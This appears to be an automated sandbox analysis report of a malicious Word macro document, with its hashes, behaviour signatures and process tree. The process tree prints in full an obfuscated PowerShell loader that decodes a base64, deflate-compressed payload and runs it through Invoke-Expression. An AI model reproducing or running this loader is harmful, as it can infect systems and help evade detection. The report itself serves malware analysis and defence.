Overview

overview

10

Static

static

8

e75b2858a8...08.doc

windows7_x64

10

e75b2858a8...08.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    01-02-2022 03:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e75b2858a88962cfb7818a6908ad01a9682b0074e5f996cede0f59c8a83a3908.doc

  • Size

    71KB

  • MD5

    451ba7b81467b1f901b347d94e0b8bd8

  • SHA1

    62b4acdf2515930af282ffac34e6e7e7bba8366c

  • SHA256

    e75b2858a88962cfb7818a6908ad01a9682b0074e5f996cede0f59c8a83a3908

  • SHA512

    1f1489718d4c28d29c7f6eae0a619cd28e84e745ba83b83b7269559e6625fa5c506930b7c9c8bb76b8030605f6f0ab589674d569bd9fc9573abe8958bafbd72a

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e75b2858a88962cfb7818a6908ad01a9682b0074e5f996cede0f59c8a83a3908.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:576
      • C:\Windows\SysWOW64\CMD.exe
        CMD c:\Windows\SySTEm32\cmd /C "SeT LdEbZ=^& ( $sheLLId[1]+$shelliD[13]+'X') (NEw-oBJEct IO.COmpREsSIoN.deFLaTeSTrEAM([io.MemorYsTrEaM] [CoNVerT]::fROMBASE64STRiNG( 'TZBNa8JAEIb/Sg6BVaybi7bUEEhbK3iwpZZaD71sNhMyurtZNhPjB/53N7ZQLwMz88zDy4Q77RID7bDKNiApeAPi35C9KARDcfis3hNWEtlJFLVtywsEJ3JQSuimRik4UjRapX8EFIVq9hpyFFxWOqplenOrhSwbi9JXB7a+Eg9qvLL235A5UaMCdGhKkYFo6NBxPHPRx7IZvS6e4FYpcqq1cFSDbBz+stFyOkNcHyTjn1Yh9VjK+nFYfK2DJGCP43vmm+MiCcHsJgTaDtgPG3T7AeOwBxYXlQOftRdujiJAE3Rf6J/IHU6h/xafVq1RlchnPuiVuQs6YT+em121heHcS6+TOPOebXyWgmR5Op8v' ) ,[systEM.IO.cOmPRESsion.cOMpressIONMOdE]::DEcomPREss) ^| % { NEw-oBJEct iO.sTReaMReAdER($_,[TEXt.ENCOdIng]::aScIi) } ).reaDToEnD( )&& POwERshELl . (\"{0}{2}{1}\"-f'sE','IteM','T-' ) ( 'vaRIable:9' + 'BUwS' + 'n' ) ( [tYPE]( \"{2}{3}{0}{1}\" -F'RONMe','nT','Env','i')) ; ( ( ^&( 'Ls' ) ( 'vAriAbLe:9' +'BuWS' + 'n' ) ).\"VA`lUe\"::(\"{3}{0}{1}{6}{4}{2}{5}\"-f'iRO','N','riAb','GetenV','a','le','menTV').Invoke( ( \"{1}{0}\" -f'ebZ','ld'),(\"{2}{0}{1}\"-f 'S','s','pRoCe') ) ) ^| ^&( \"{1}{0}{3}{2}\" -f 'nVoKE','I','ESsiOn','-EXpR')"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:676
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          POwERshELl . (\"{0}{2}{1}\"-f'sE','IteM','T-' ) ( 'vaRIable:9' + 'BUwS' + 'n' ) ( [tYPE]( \"{2}{3}{0}{1}\" -F'RONMe','nT','Env','i')) ; ( ( &( 'Ls' ) ( 'vAriAbLe:9' +'BuWS' + 'n' ) ).\"VA`lUe\"::(\"{3}{0}{1}{6}{4}{2}{5}\"-f'iRO','N','riAb','GetenV','a','le','menTV').Invoke( ( \"{1}{0}\" -f'ebZ','ld'),(\"{2}{0}{1}\"-f 'S','s','pRoCe') ) ) | &( \"{1}{0}{3}{2}\" -f 'nVoKE','I','ESsiOn','-EXpR')
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1984

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/576-59-0x000007FEFC2A1000-0x000007FEFC2A3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/956-55-0x0000000072BF1000-0x0000000072BF4000-memory.dmp

      Filesize

      12KB

      Download

    • memory/956-56-0x0000000070671000-0x0000000070673000-memory.dmp

      Filesize

      8KB

      Download

    • memory/956-57-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/956-58-0x0000000076B81000-0x0000000076B83000-memory.dmp

      Filesize

      8KB

      Download

    • memory/956-64-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1984-61-0x00000000023B0000-0x0000000002FFA000-memory.dmp

      Filesize

      12.3MB

      Download

    • memory/1984-62-0x0000000004BF0000-0x0000000005241000-memory.dmp

      Filesize

      6.3MB

      Download

    • memory/1984-63-0x00000000055B0000-0x000000000560B000-memory.dmp

      Filesize

      364KB

      Download